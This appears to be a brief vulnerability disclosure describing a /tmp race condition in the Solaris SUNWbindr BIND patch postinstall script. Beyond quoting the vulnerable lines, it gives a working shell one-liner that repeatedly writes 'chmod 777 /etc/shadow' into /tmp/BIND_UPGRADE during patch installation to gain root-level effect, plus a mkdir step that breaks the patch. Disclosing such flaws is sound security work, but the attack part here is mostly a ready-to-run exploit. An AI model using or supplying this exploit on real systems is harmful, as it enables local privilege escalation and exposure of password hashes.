There is a race condition with the postinstall script for SUNWbindr that if update manager is being used or 
smpatch while the system is in multi user mode could lead to arbitrary code execution as root.

./patches/119784-22/SUNWbindr/install/pkg_postinstall:    UPGRADE=${TMP}/BIND_UPGRADE
./patches/119784-22/SUNWbindr/install/postinstall:    UPGRADE=${TMP}/BIND_UPGRADE

vulnerable code:

  UPGRADE=${TMP}/BIND_UPGRADE
        rm -f $UPGRADE

(If I create the file first between these two steps, I should have ownership before it is over written and inject malicious code to get root.)

cat >> $UPGRADE <<-\_UPDATE_START_METHOD
        oset=$@ # Remember current options if any.
        svc="svc:network/dns/server"
        if [ -z "$TMP" ]; then
            TMP="/tmp"
        fi

Something like:

while(1) { 
	echo "chmod 777 /etc/shadow"  >> /tmp/BIND_UPGRADE; 
}

Or repeatedly touching the file and checking for write permission with the existence of the string BIND_UPGRADE in its contents would 
also mean you won the race.  Then inject malicious code.  

At the least you can break the patch by creating a directory
called /tmp/BIND_UPGRADE.

# mkdir /tmp/BIND_UPGRADE


Exploit:

larry@s0l4r1s:/tmp$ while (true) ; do touch /tmp/BIND_UPGRADE ;echo "chmod 777 /etc/shadow" > /tmp/BIND_UPGRADE; done

during patch installation will get /etc/shadow world writeable.